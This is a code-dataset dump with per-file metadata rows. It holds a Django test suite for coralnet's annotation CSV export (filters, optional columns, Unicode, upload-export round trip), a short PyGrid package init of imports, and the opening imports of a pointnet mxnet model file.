| 28.571429 | 34 | 0.82 | 30 | 200 | 5.266667 | 0.3 | 0.341772 | 0.474684 | 0.632911 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12 | 200 | 6 | 35 | 33.333333 | 0.897727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |

8962e429da829e898ea84224366fa3d865b05e5d | 31,664 | py | Python | project/export/tests/test_annotations_csv.py | beijbom/coralnet | c3f4a44eeb60cb41a079329a0068dc8b34096e89 | ["BSD-2-Clause"] | 31 | 2019-12-08T14:22:52.000Z | 2021-12-27T04:58:12.000Z | project/export/tests/test_annotations_csv.py | beijbom/coralnet | c3f4a44eeb60cb41a079329a0068dc8b34096e89 | ["BSD-2-Clause"] | 193 | 2019-12-07T23:27:43.000Z | 2022-03-05T08:05:46.000Z | project/export/tests/test_annotations_csv.py | beijbom/coralnet | c3f4a44eeb60cb41a079329a0068dc8b34096e89 | ["BSD-2-Clause"] | null | null | null |

import datetime
from django.core.files.base import ContentFile
from django.shortcuts import resolve_url
from django.test import override_settings
from django.urls import reverse
from annotations.models import Annotation
from export.tests.utils import BaseExportTest
from images.model_utils import PointGen
from lib.tests.utils import BasePermissionTest
from upload.tests.utils import UploadAnnotationsTestMixin


class PermissionTest(BasePermissionTest):
    def test_annotations(self):
        url = reverse('export_annotations', args=[self.source.pk])
        self.source_to_private()
        self.assertPermissionLevel(
            url, self.SOURCE_VIEW, content_type='text/csv')
        self.source_to_public()
        self.assertPermissionLevel(
            url, self.SIGNED_IN, content_type='text/csv',
            deny_type=self.REQUIRE_LOGIN)


class ImageSetTest(BaseExportTest):
    """Test annotations export to CSV for different kinds of image subsets."""

    @classmethod
    def setUpTestData(cls):
        super().setUpTestData()
        cls.user = cls.create_user()
        cls.source = cls.create_source(
            cls.user,
            # Uniform grid gives us consistent point locations.
            point_generation_type=PointGen.Types.UNIFORM,
            number_of_cell_rows=1, number_of_cell_columns=2,
        )
        cls.labels = cls.create_labels(cls.user, ['A', 'B'], 'GroupA')
        cls.create_labelset(cls.user, cls.source, cls.labels)

    def test_all_images_single(self):
        """Export for 1 out of 1 images."""
        self.img1 = self.upload_image(
            self.user, self.source,
            dict(filename='1.jpg', width=400, height=300))
        self.add_annotations(self.user, self.img1, {1: 'A', 2: 'B'})
        post_data = self.default_search_params.copy()
        response = self.export_annotations(post_data)
        expected_lines = [
            'Name,Row,Column,Label',
            '1.jpg,149,99,A',
            '1.jpg,149,299,B',
        ]
        self.assert_csv_content_equal(response.content, expected_lines)

    def test_all_images_multiple(self):
        """Export for 3 out of 3 images."""
        self.img1 = self.upload_image(
            self.user, self.source,
            dict(filename='1.jpg', width=400, height=300))
        self.img2 = self.upload_image(
            self.user, self.source,
            dict(filename='2.jpg', width=400, height=400))
        self.img3 = self.upload_image(
            self.user, self.source,
            dict(filename='3.jpg', width=400, height=200))
        self.add_annotations(self.user, self.img1, {1: 'A', 2: 'B'})
        self.add_annotations(self.user, self.img2, {1: 'B', 2: 'A'})
        self.add_annotations(self.user, self.img3, {1: 'B', 2: 'B'})
        post_data = self.default_search_params.copy()
        response = self.export_annotations(post_data)
        expected_lines = [
            'Name,Row,Column,Label',
            '1.jpg,149,99,A',
            '1.jpg,149,299,B',
            '2.jpg,199,99,B',
            '2.jpg,199,299,A',
            '3.jpg,99,99,B',
            '3.jpg,99,299,B',
        ]
        self.assert_csv_content_equal(response.content, expected_lines)

    def test_image_subset_by_metadata(self):
        """Export for some, but not all, images."""
        self.img1 = self.upload_image(
            self.user, self.source,
            dict(filename='1.jpg', width=400, height=300))
        self.img2 = self.upload_image(
            self.user, self.source,
            dict(filename='2.jpg', width=400, height=400))
        self.img3 = self.upload_image(
            self.user, self.source,
            dict(filename='3.jpg', width=400, height=200))
        self.add_annotations(self.user, self.img1, {1: 'A', 2: 'B'})
        self.add_annotations(self.user, self.img2, {1: 'B', 2: 'A'})
        self.add_annotations(self.user, self.img3, {1: 'B', 2: 'B'})
        self.img1.metadata.aux1 = 'X'
        self.img1.metadata.save()
        self.img2.metadata.aux1 = 'Y'
        self.img2.metadata.save()
        self.img3.metadata.aux1 = 'X'
        self.img3.metadata.save()
        post_data = self.default_search_params.copy()
        post_data['aux1'] = 'X'
        response = self.export_annotations(post_data)
        expected_lines = [
            'Name,Row,Column,Label',
            '1.jpg,149,99,A',
            '1.jpg,149,299,B',
            '3.jpg,99,99,B',
            '3.jpg,99,299,B',
        ]
        self.assert_csv_content_equal(response.content, expected_lines)

    def test_image_subset_by_annotation_status(self):
        """Export for some, but not all, images. Different search criteria.
        Just a sanity check to ensure the image filtering is as complete
        as it should be."""
        self.img1 = self.upload_image(
            self.user, self.source,
            dict(filename='1.jpg', width=400, height=300))
        self.img2 = self.upload_image(
            self.user, self.source,
            dict(filename='2.jpg', width=400, height=400))
        self.img3 = self.upload_image(
            self.user, self.source,
            dict(filename='3.jpg', width=400, height=200))
        robot = self.create_robot(self.source)
        self.add_robot_annotations(robot, self.img1, {1: 'A', 2: 'A'})
        self.add_robot_annotations(robot, self.img2, {1: 'A', 2: 'A'})
        self.add_robot_annotations(robot, self.img3, {1: 'A', 2: 'A'})
        # Only images 2 and 3 become confirmed
        self.add_annotations(self.user, self.img2, {1: 'B', 2: 'A'})
        self.add_annotations(self.user, self.img3, {1: 'B', 2: 'B'})
        post_data = self.default_search_params.copy()
        post_data['annotation_status'] = 'confirmed'
        response = self.export_annotations(post_data)
        expected_lines = [
            'Name,Row,Column,Label',
            '2.jpg,199,99,B',
            '2.jpg,199,299,A',
            '3.jpg,99,99,B',
            '3.jpg,99,299,B',
        ]
        self.assert_csv_content_equal(response.content, expected_lines)

    def test_image_empty_set(self):
        """Export for 0 images."""
        self.img1 = self.upload_image(
            self.user, self.source,
            dict(filename='1.jpg', width=400, height=300))
        self.add_annotations(self.user, self.img1, {1: 'A', 2: 'B'})
        post_data = self.default_search_params.copy()
        post_data['image_name'] = '5.jpg'
        response = self.export_annotations(post_data)
        expected_lines = [
            'Name,Row,Column,Label',
        ]
        self.assert_csv_content_equal(response.content, expected_lines)

    def test_invalid_image_set_params(self):
        self.upload_image(self.user, self.source)
        post_data = self.default_search_params.copy()
        post_data['photo_date_0'] = 'abc'
        response = self.export_annotations(post_data)
        # Display an error in HTML instead of serving CSV.
        self.assertTrue(response['content-type'].startswith('text/html'))
        self.assertContains(response, "Image-search parameters were invalid.")

    def test_dont_get_other_sources_images(self):
        """Don't export for other sources' images."""
        self.img1 = self.upload_image(
            self.user, self.source,
            dict(filename='1.jpg', width=400, height=300))
        self.add_annotations(self.user, self.img1, {1: 'A', 2: 'B'})
        source2 = self.create_source(
            self.user,
            point_generation_type=PointGen.Types.UNIFORM,
            number_of_cell_rows=1, number_of_cell_columns=2)
        self.create_labelset(self.user, source2, self.labels)
        img2 = self.upload_image(self.user, source2, dict(filename='2.jpg'))
        self.add_annotations(self.user, img2, {1: 'A', 2: 'B'})
        post_data = self.default_search_params.copy()
        response = self.export_annotations(post_data)
        # Should have image 1, but not 2
        expected_lines = [
            'Name,Row,Column,Label',
            '1.jpg,149,99,A',
            '1.jpg,149,299,B',
        ]
        self.assert_csv_content_equal(response.content, expected_lines)


class AnnotationStatusTest(BaseExportTest):
    """Test annotations export to CSV for images of various annotation
    statuses."""

    @classmethod
    def setUpTestData(cls):
        super().setUpTestData()
        cls.user = cls.create_user()
        cls.source = cls.create_source(
            cls.user,
            point_generation_type=PointGen.Types.UNIFORM,
            number_of_cell_rows=1, number_of_cell_columns=2,
        )
        labels = cls.create_labels(cls.user, ['A', 'B'], 'GroupA')
        cls.create_labelset(cls.user, cls.source, labels)
        cls.img1 = cls.upload_image(
            cls.user, cls.source,
            dict(filename='1.jpg', width=400, height=300))

    def test_not_annotated(self):
        response = self.export_annotations(self.default_search_params)
        expected_lines = [
            'Name,Row,Column,Label',
        ]
        self.assert_csv_content_equal(response.content, expected_lines)

    def test_partially_annotated(self):
        self.add_annotations(self.user, self.img1, {1: 'B'})
        response = self.export_annotations(self.default_search_params)
        expected_lines = [
            'Name,Row,Column,Label',
            '1.jpg,149,99,B',
        ]
        self.assert_csv_content_equal(response.content, expected_lines)

    def test_fully_annotated(self):
        self.add_annotations(self.user, self.img1, {1: 'B', 2: 'A'})
        response = self.export_annotations(self.default_search_params)
        expected_lines = [
            'Name,Row,Column,Label',
            '1.jpg,149,99,B',
            '1.jpg,149,299,A',
        ]
        self.assert_csv_content_equal(response.content, expected_lines)

    def test_machine_annotated(self):
        robot = self.create_robot(self.source)
        self.add_robot_annotations(robot, self.img1, {1: 'B', 2: 'A'})
        response = self.export_annotations(self.default_search_params)
        expected_lines = [
            'Name,Row,Column,Label',
            '1.jpg,149,99,B',
            '1.jpg,149,299,A',
        ]
        self.assert_csv_content_equal(response.content, expected_lines)

    def test_part_machine_part_manual(self):
        robot = self.create_robot(self.source)
        self.add_robot_annotations(robot, self.img1, {1: 'B', 2: 'A'})
        self.add_annotations(self.user, self.img1, {2: 'A'})
        response = self.export_annotations(self.default_search_params)
        expected_lines = [
            'Name,Row,Column,Label',
            '1.jpg,149,99,B',
            '1.jpg,149,299,A',
        ]
        self.assert_csv_content_equal(response.content, expected_lines)


class AnnotatorInfoColumnsTest(BaseExportTest, UploadAnnotationsTestMixin):
    """Test the optional annotation info columns."""

    @classmethod
    def setUpTestData(cls):
        super().setUpTestData()
        cls.user = cls.create_user()
        cls.source = cls.create_source(
            cls.user,
            point_generation_type=PointGen.Types.UNIFORM,
            number_of_cell_rows=1, number_of_cell_columns=1,
        )
        labels = cls.create_labels(cls.user, ['A', 'B'], 'GroupA')
        cls.create_labelset(cls.user, cls.source, labels)
        cls.img1 = cls.upload_image(
            cls.user, cls.source,
            dict(filename='1.jpg', width=400, height=300))

    def test_user_annotation(self):
        self.add_annotations(self.user, self.img1, {1: 'B'})
        post_data = self.default_search_params.copy()
        post_data['optional_columns'] = ['annotator_info']
        response = self.export_annotations(post_data)
        annotation_date = \
            Annotation.objects.get(image=self.img1).annotation_date
        date_str = annotation_date.strftime('%Y-%m-%d %H:%M:%S+00:00')
        expected_lines = [
            'Name,Row,Column,Label,Annotator,Date annotated',
            '1.jpg,149,199,B,{username},{date}'.format(
                username=self.user.username, date=date_str),
        ]
        self.assert_csv_content_equal(response.content, expected_lines)

    def test_imported_annotation(self):
        # Import an annotation
        rows = [
            ['Name', 'Row', 'Column', 'Label'],
            ['1.jpg', 50, 70, 'B'],
        ]
        csv_file = self.make_csv_file('A.csv', rows)
        self.preview_csv_annotations(
            self.user, self.source, csv_file)
        self.upload_annotations(self.user, self.source)
        post_data = self.default_search_params.copy()
        post_data['optional_columns'] = ['annotator_info']
        response = self.export_annotations(post_data)
        annotation_date = \
            Annotation.objects.get(image=self.img1).annotation_date
        date_str = annotation_date.strftime('%Y-%m-%d %H:%M:%S+00:00')
        expected_lines = [
            'Name,Row,Column,Label,Annotator,Date annotated',
            '1.jpg,50,70,B,Imported,{date}'.format(date=date_str),
        ]
        self.assert_csv_content_equal(response.content, expected_lines)

    def test_machine_annotation(self):
        robot = self.create_robot(self.source)
        self.add_robot_annotations(robot, self.img1, {1: 'B'})
        post_data = self.default_search_params.copy()
        post_data['optional_columns'] = ['annotator_info']
        response = self.export_annotations(post_data)
        annotation_date = \
            Annotation.objects.get(image=self.img1).annotation_date
        date_str = annotation_date.strftime('%Y-%m-%d %H:%M:%S+00:00')
        expected_lines = [
            'Name,Row,Column,Label,Annotator,Date annotated',
            '1.jpg,149,199,B,robot,{date}'.format(date=date_str),
        ]
        self.assert_csv_content_equal(response.content, expected_lines)


class MachineSuggestionColumnsTest(BaseExportTest):
    """Test the optional machine suggestion columns."""

    @classmethod
    def setUpTestData(cls):
        super().setUpTestData()
        cls.user = cls.create_user()
        cls.source = cls.create_source(
            cls.user,
            point_generation_type=PointGen.Types.UNIFORM,
            number_of_cell_rows=1, number_of_cell_columns=1,
        )
        labels = cls.create_labels(cls.user, ['A', 'B'], 'GroupA')
        cls.create_labelset(cls.user, cls.source, labels)
        cls.img1 = cls.upload_image(
            cls.user, cls.source,
            dict(filename='1.jpg', width=400, height=300))

    @override_settings(NBR_SCORES_PER_ANNOTATION=2)
    def test_blank(self):
        self.add_annotations(self.user, self.img1, {1: 'B'})
        post_data = self.default_search_params.copy()
        post_data['optional_columns'] = ['machine_suggestions']
        response = self.export_annotations(post_data)
        expected_lines = [
            'Name,Row,Column,Label'
            ',Machine suggestion 1,Machine confidence 1'
            ',Machine suggestion 2,Machine confidence 2',
            '1.jpg,149,199,B,,,,',
        ]
        self.assert_csv_content_equal(response.content, expected_lines)

    @override_settings(NBR_SCORES_PER_ANNOTATION=2)
    def test_all_suggestions_filled(self):
        robot = self.create_robot(self.source)
        # Normally we don't make assumptions on how add_robot_annotations()
        # assigns confidences after the first one, but since we only have 2
        # labels in the labelset, it should be safe to assume confidences of
        # 60 and 40 if we pass a top score of 60.
        self.add_robot_annotations(robot, self.img1, {1: ('B', 60)})
        post_data = self.default_search_params.copy()
        post_data['optional_columns'] = ['machine_suggestions']
        response = self.export_annotations(post_data)
        expected_lines = [
            'Name,Row,Column,Label'
            ',Machine suggestion 1,Machine confidence 1'
            ',Machine suggestion 2,Machine confidence 2',
            '1.jpg,149,199,B,B,60,A,40',
        ]
        self.assert_csv_content_equal(response.content, expected_lines)

    @override_settings(NBR_SCORES_PER_ANNOTATION=3)
    def test_some_suggestions_filled(self):
        robot = self.create_robot(self.source)
        # As before, we're assuming this gets confidences of 60 and 40.
        self.add_robot_annotations(robot, self.img1, {1: ('B', 60)})
        post_data = self.default_search_params.copy()
        post_data['optional_columns'] = ['machine_suggestions']
        response = self.export_annotations(post_data)
        expected_lines = [
            'Name,Row,Column,Label'
            ',Machine suggestion 1,Machine confidence 1'
            ',Machine suggestion 2,Machine confidence 2'
            ',Machine suggestion 3,Machine confidence 3',
            '1.jpg,149,199,B,B,60,A,40,,',
        ]
        self.assert_csv_content_equal(response.content, expected_lines)


class MetadataAuxColumnsTest(BaseExportTest):
    """Test the optional aux. metadata columns."""

    @classmethod
    def setUpTestData(cls):
        super().setUpTestData()
        cls.user = cls.create_user()
        cls.source = cls.create_source(
            cls.user,
            point_generation_type=PointGen.Types.UNIFORM,
            number_of_cell_rows=1, number_of_cell_columns=1,
        )
        labels = cls.create_labels(cls.user, ['A', 'B'], 'GroupA')
        cls.create_labelset(cls.user, cls.source, labels)
        cls.img1 = cls.upload_image(
            cls.user, cls.source,
            dict(filename='1.jpg', width=400, height=300))

    def test_blank(self):
        self.add_annotations(self.user, self.img1, {1: 'B'})
        post_data = self.default_search_params.copy()
        post_data['optional_columns'] = ['metadata_date_aux']
        response = self.export_annotations(post_data)
        expected_lines = [
            'Name,Date,Aux1,Aux2,Aux3,Aux4,Aux5,Row,Column,Label',
            '1.jpg,,,,,,,149,199,B',
        ]
        self.assert_csv_content_equal(response.content, expected_lines)

    def test_filled(self):
        self.img1.metadata.photo_date = datetime.date(2001, 2, 3)
        self.img1.metadata.aux1 = "Site A"
        self.img1.metadata.aux2 = "Transect 1-2"
        self.img1.metadata.aux3 = "Quadrant 5"
        self.img1.metadata.save()
        self.add_annotations(self.user, self.img1, {1: 'B'})
        post_data = self.default_search_params.copy()
        post_data['optional_columns'] = ['metadata_date_aux']
        response = self.export_annotations(post_data)
        expected_lines = [
            'Name,Date,Aux1,Aux2,Aux3,Aux4,Aux5,Row,Column,Label',
            '1.jpg,2001-02-03,Site A,Transect 1-2,Quadrant 5,,,149,199,B',
        ]
        self.assert_csv_content_equal(response.content, expected_lines)

    def test_named_aux_fields(self):
        self.source.key1 = "Site"
        self.source.key2 = "Transect"
        self.source.key3 = "Quadrant"
        self.source.save()
        self.img1.metadata.photo_date = datetime.date(2001, 2, 3)
        self.img1.metadata.aux1 = "Site A"
        self.img1.metadata.aux2 = "Transect 1-2"
        self.img1.metadata.aux3 = "Quadrant 5"
        self.img1.metadata.save()
        self.add_annotations(self.user, self.img1, {1: 'B'})
        post_data = self.default_search_params.copy()
        post_data['optional_columns'] = ['metadata_date_aux']
        response = self.export_annotations(post_data)
        expected_lines = [
            'Name,Date,Site,Transect,Quadrant,Aux4,Aux5,Row,Column,Label',
            '1.jpg,2001-02-03,Site A,Transect 1-2,Quadrant 5,,,149,199,B',
        ]
        self.assert_csv_content_equal(response.content, expected_lines)


class MetadataOtherColumnsTest(BaseExportTest):
    """Test the optional other metadata columns."""

    @classmethod
    def setUpTestData(cls):
        super().setUpTestData()
        cls.user = cls.create_user()
        cls.source = cls.create_source(
            cls.user,
            point_generation_type=PointGen.Types.UNIFORM,
            number_of_cell_rows=1, number_of_cell_columns=1,
        )
        labels = cls.create_labels(cls.user, ['A', 'B'], 'GroupA')
        cls.create_labelset(cls.user, cls.source, labels)
        cls.img1 = cls.upload_image(
            cls.user, cls.source,
            dict(filename='1.jpg', width=400, height=300))

    def test_blank(self):
        self.add_annotations(self.user, self.img1, {1: 'B'})
        post_data = self.default_search_params.copy()
        post_data['optional_columns'] = ['metadata_other']
        response = self.export_annotations(post_data)
        expected_lines = [
            'Name,Height (cm),Latitude,Longitude,Depth,Camera,Photographer'
            ',Water quality,Strobes,Framing gear used,White balance card'
            ',Comments,Row,Column,Label',
            '1.jpg,,,,,,,,,,,,149,199,B',
        ]
        self.assert_csv_content_equal(response.content, expected_lines)

    def test_filled(self):
        self.img1.metadata.height_in_cm = 40
        self.img1.metadata.latitude = "5.789"
        self.img1.metadata.longitude = "-50"
        self.img1.metadata.depth = "10m"
        self.img1.metadata.camera = "Nikon"
        self.img1.metadata.photographer = "John Doe"
        self.img1.metadata.water_quality = "Clear"
        self.img1.metadata.strobes = "White A"
        self.img1.metadata.framing = "Framing set C"
        self.img1.metadata.balance = "Card B"
        self.img1.metadata.comments = "Here are\nsome comments."
        self.img1.metadata.save()
        self.add_annotations(self.user, self.img1, {1: 'B'})
        post_data = self.default_search_params.copy()
        post_data['optional_columns'] = ['metadata_other']
        response = self.export_annotations(post_data)
        expected_lines = [
            'Name,Height (cm),Latitude,Longitude,Depth,Camera,Photographer'
            ',Water quality,Strobes,Framing gear used,White balance card'
            ',Comments,Row,Column,Label',
            '1.jpg,40,5.789,-50,10m,Nikon,John Doe'
            ',Clear,White A,Framing set C,Card B'
            ',"Here are\nsome comments.",149,199,B',
        ]
        self.assert_csv_content_equal(response.content, expected_lines)


class MoreOptionalColumnsCasesTest(BaseExportTest):
    """Test combinations of optional column sets, and invalid columns."""

    @classmethod
    def setUpTestData(cls):
        super().setUpTestData()
        cls.user = cls.create_user()
        cls.source = cls.create_source(
            cls.user,
            point_generation_type=PointGen.Types.UNIFORM,
            number_of_cell_rows=1, number_of_cell_columns=1,
        )
        labels = cls.create_labels(cls.user, ['A', 'B'], 'GroupA')
        cls.create_labelset(cls.user, cls.source, labels)
        cls.img1 = cls.upload_image(
            cls.user, cls.source,
            dict(filename='1.jpg', width=400, height=300))

    def test_both_metadata_column_sets(self):
        self.source.key1 = "Site"
        self.source.key2 = "Transect"
        self.source.key3 = "Quadrant"
        self.source.save()
        self.img1.metadata.photo_date = datetime.date(2001, 2, 3)
        self.img1.metadata.aux1 = "Site A"
        self.img1.metadata.aux2 = "Transect 1-2"
        self.img1.metadata.aux3 = "Quadrant 5"
        self.img1.metadata.height_in_cm = 40
        self.img1.metadata.latitude = "5.789"
        self.img1.metadata.longitude = "-50"
        self.img1.metadata.depth = "10m"
        self.img1.metadata.camera = "Nikon"
        self.img1.metadata.photographer = "John Doe"
        self.img1.metadata.water_quality = "Clear"
        self.img1.metadata.strobes = "White A"
        self.img1.metadata.framing = "Framing set C"
        self.img1.metadata.balance = "Card B"
        self.img1.metadata.comments = "Here are\nsome comments."
        self.img1.metadata.save()
        self.add_annotations(self.user, self.img1, {1: 'B'})
        post_data = self.default_search_params.copy()
        post_data['optional_columns'] = ['metadata_date_aux', 'metadata_other']
        response = self.export_annotations(post_data)
        expected_lines = [
            'Name,Date,Site,Transect,Quadrant,Aux4,Aux5'
            ',Height (cm),Latitude,Longitude,Depth,Camera,Photographer'
            ',Water quality,Strobes,Framing gear used,White balance card'
            ',Comments,Row,Column,Label',
            '1.jpg,2001-02-03,Site A,Transect 1-2,Quadrant 5'
            ',,,40,5.789,-50,10m,Nikon,John Doe'
            ',Clear,White A,Framing set C,Card B'
            ',"Here are\nsome comments.",149,199,B',
        ]
        self.assert_csv_content_equal(response.content, expected_lines)

    def test_another_combination_of_two_sets(self):
        self.source.key1 = "Site"
        self.source.key2 = "Transect"
        self.source.key3 = "Quadrant"
        self.source.save()
        self.img1.metadata.photo_date = datetime.date(2001, 2, 3)
        self.img1.metadata.aux1 = "Site A"
        self.img1.metadata.aux2 = "Transect 1-2"
        self.img1.metadata.aux3 = "Quadrant 5"
        self.img1.metadata.save()
        self.add_annotations(self.user, self.img1, {1: 'B'})
        post_data = self.default_search_params.copy()
        post_data['optional_columns'] = ['annotator_info', 'metadata_date_aux']
        response = self.export_annotations(post_data)
        annotation_date = \
            Annotation.objects.get(image=self.img1).annotation_date
        date_str = annotation_date.strftime('%Y-%m-%d %H:%M:%S+00:00')
        expected_lines = [
            'Name,Date,Site,Transect,Quadrant,Aux4,Aux5'
            ',Row,Column,Label,Annotator,Date annotated',
            '1.jpg,2001-02-03,Site A,Transect 1-2,Quadrant 5,,'
            ',149,199,B,{username},{date}'.format(
                username=self.user.username, date=date_str),
        ]
        self.assert_csv_content_equal(response.content, expected_lines)

    @override_settings(NBR_SCORES_PER_ANNOTATION=2)
    def test_all_sets(self):
        self.source.key1 = "Site"
        self.source.key2 = "Transect"
        self.source.key3 = "Quadrant"
        self.source.save()
        self.img1.metadata.photo_date = datetime.date(2001, 2, 3)
        self.img1.metadata.aux1 = "Site A"
        self.img1.metadata.aux2 = "Transect 1-2"
        self.img1.metadata.aux3 = "Quadrant 5"
        self.img1.metadata.height_in_cm = 40
        self.img1.metadata.latitude = "5.789"
        self.img1.metadata.longitude = "-50"
        self.img1.metadata.depth = "10m"
        self.img1.metadata.camera = "Nikon"
        self.img1.metadata.photographer = "John Doe"
        self.img1.metadata.water_quality = "Clear"
        self.img1.metadata.strobes = "White A"
        self.img1.metadata.framing = "Framing set C"
        self.img1.metadata.balance = "Card B"
        self.img1.metadata.comments = "Here are\nsome comments."
        self.img1.metadata.save()
        robot = self.create_robot(self.source)
        self.add_robot_annotations(robot, self.img1, {1: ('B', 60)})
        self.add_annotations(self.user, self.img1, {1: 'B'})
        post_data = self.default_search_params.copy()
        post_data['optional_columns'] = [
            'annotator_info', 'machine_suggestions',
            'metadata_date_aux', 'metadata_other']
        response = self.export_annotations(post_data)
        annotation_date = \
            Annotation.objects.get(image=self.img1).annotation_date
        date_str = annotation_date.strftime('%Y-%m-%d %H:%M:%S+00:00')
        expected_lines = [
            'Name,Date,Site,Transect,Quadrant,Aux4,Aux5'
            ',Height (cm),Latitude,Longitude,Depth,Camera,Photographer'
            ',Water quality,Strobes,Framing gear used,White balance card'
            ',Comments,Row,Column,Label'
            ',Annotator,Date annotated'
            ',Machine suggestion 1,Machine confidence 1'
            ',Machine suggestion 2,Machine confidence 2',
            '1.jpg,2001-02-03,Site A,Transect 1-2,Quadrant 5,,'
            ',40,5.789,-50,10m,Nikon,John Doe'
            ',Clear,White A,Framing set C,Card B'
            ',"Here are\nsome comments.",149,199,B'
            ',{username},{date},B,60,A,40'.format(
                username=self.user.username, date=date_str),
        ]
        self.assert_csv_content_equal(response.content, expected_lines)

    def test_invalid_column_name(self):
        self.add_annotations(self.user, self.img1, {1: 'B'})
        post_data = self.default_search_params.copy()
        post_data['optional_columns'] = ['jpg_files']
        response = self.export_annotations(post_data)
        # Display an error in HTML instead of serving CSV.
        self.assertTrue(response['content-type'].startswith('text/html'))
        self.assertContains(
            response,
            "Select a valid choice."
            " jpg_files is not one of the available choices.")


class UnicodeTest(BaseExportTest):
    """Test that non-ASCII characters don't cause problems."""

    @classmethod
    def setUpTestData(cls):
        super().setUpTestData()
        cls.user = cls.create_user()
        cls.source = cls.create_source(
            cls.user,
            point_generation_type=PointGen.Types.UNIFORM,
            number_of_cell_rows=1, number_of_cell_columns=1,
        )
        labels = cls.create_labels(cls.user, ['A', 'B'], 'GroupA')
        cls.create_labelset(cls.user, cls.source, labels)
        # Unicode custom label code
        local_label = cls.source.labelset.locallabel_set.get(code='B')
        local_label.code = 'い'
        local_label.save()
        cls.img1 = cls.upload_image(
            cls.user, cls.source,
            dict(filename='あ.jpg', width=400, height=300))

    def test(self):
        self.add_annotations(self.user, self.img1, {1: 'い'})
        post_data = self.default_search_params.copy()
        response = self.export_annotations(post_data)
        expected_lines = [
            'Name,Row,Column,Label',
            'あ.jpg,149,199,い',
        ]
        self.assert_csv_content_equal(
            response.content, expected_lines)


class UploadAndExportSameDataTest(BaseExportTest):
    """Test that we can upload a CSV and then export the exact same CSV."""

    @classmethod
    def setUpTestData(cls):
        super().setUpTestData()
        cls.user = cls.create_user()
        cls.source = cls.create_source(
            cls.user,
            point_generation_type=PointGen.Types.UNIFORM,
            number_of_cell_rows=1, number_of_cell_columns=1,
        )
        labels = cls.create_labels(cls.user, ['A', 'B'], 'GroupA')
        cls.create_labelset(cls.user, cls.source, labels)

    def test(self):
        self.img1 = self.upload_image(
            self.user, self.source,
            dict(filename='1.jpg', width=400, height=300))
        # Upload annotations
        content = ''
        csv_lines = [
            'Name,Row,Column,Label',
            '1.jpg,149,199,A',
        ]
        for line in csv_lines:
            content += (line + '\n')
        csv_file = ContentFile(content, name='annotations.csv')
        self.client.force_login(self.user)
        self.client.post(
            resolve_url('upload_annotations_csv_preview_ajax', self.source.pk),
            {'csv_file': csv_file},
        )
        self.client.post(
            resolve_url('upload_annotations_ajax', self.source.pk),
        )
        # Export annotations
        post_data = self.default_search_params.copy()
        response = self.export_annotations(post_data)
        self.assert_csv_content_equal(response.content, csv_lines)
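
Throughout these tests, the expected Row/Column values are the zero-indexed centers of the uniform point grid configured in setUpTestData. A small sketch of that arithmetic — this mirrors what the expected CSV lines assume; the actual generator lives in images.model_utils.PointGen:

def uniform_grid_points(width, height, rows, cols):
    # Zero-indexed cell centers of a rows x cols uniform grid, e.g.
    # width=400, cols=2 -> columns 99 and 299; height=300, rows=1 -> row 149.
    return [(int(height * (r + 0.5) / rows) - 1,
             int(width * (c + 0.5) / cols) - 1)
            for r in range(rows) for c in range(cols)]

assert uniform_grid_points(400, 300, 1, 2) == [(149, 99), (149, 299)]
assert uniform_grid_points(400, 300, 1, 1) == [(149, 199)]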

| 38.427184 | 79 | 0.622 | 3,957 | 31,664 | 4.801365 | 0.080364 | 0.042107 | 0.051371 | 0.035107 | 0.848676 | 0.839781 | 0.836044 | 0.822517 | 0.816727 | 0.8042 | 0 | 0.038195 | 0.251705 | 31,664 | 823 | 80 | 38.473876 | 0.763653 | 0.044404 | 0 | 0.738931 | 0 | 0.006107 | 0.156887 | 0.054861 | 0 | 0 | 0 | 0 | 0.050382 | 1 | 0.059542 | false | 0 | 0.018321 | 0 | 0.09313 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |

89652e0cdf60affecd26292ef2ffa540a293d51b | 75 | py | Python | grid/app/main/routes/__init__.py | sachin-101/PyGrid | b8d3c360cf4ae447ead199f72fda7fd74c5ed79e | ["Apache-2.0"] | null | null | null | grid/app/main/routes/__init__.py | sachin-101/PyGrid | b8d3c360cf4ae447ead199f72fda7fd74c5ed79e | ["Apache-2.0"] | null | null | null | grid/app/main/routes/__init__.py | sachin-101/PyGrid | b8d3c360cf4ae447ead199f72fda7fd74c5ed79e | ["Apache-2.0"] | 1 | 2021-07-06T04:30:51.000Z | 2021-07-06T04:30:51.000Z |

from .sfl.routes import *
from .dfl.routes import *
from .general import *

| 18.75 | 25 | 0.733333 | 11 | 75 | 5 | 0.545455 | 0.436364 | 0.581818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 75 | 3 | 26 | 25 | 0.873016 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |

897693fce29e73bf0178881bdf6afb39110a1eb6 | 1,574 | py | Python | models/pointnet_cls.py | hnVfly/pointnet.mxnet | 1d214a687bdddf488167204ad787d1a8b0770556 | ["MIT"] | 2 | 2018-08-30T11:57:19.000Z | 2018-08-31T01:44:06.000Z | models/pointnet_cls.py | hnVfly/pointnet.mxnet | 1d214a687bdddf488167204ad787d1a8b0770556 | ["MIT"] | null | null | null | models/pointnet_cls.py | hnVfly/pointnet.mxnet | 1d214a687bdddf488167204ad787d1a8b0770556 | ["MIT"] | null | null | null |

from mxnet import nd
from mxnet.gluon import nn
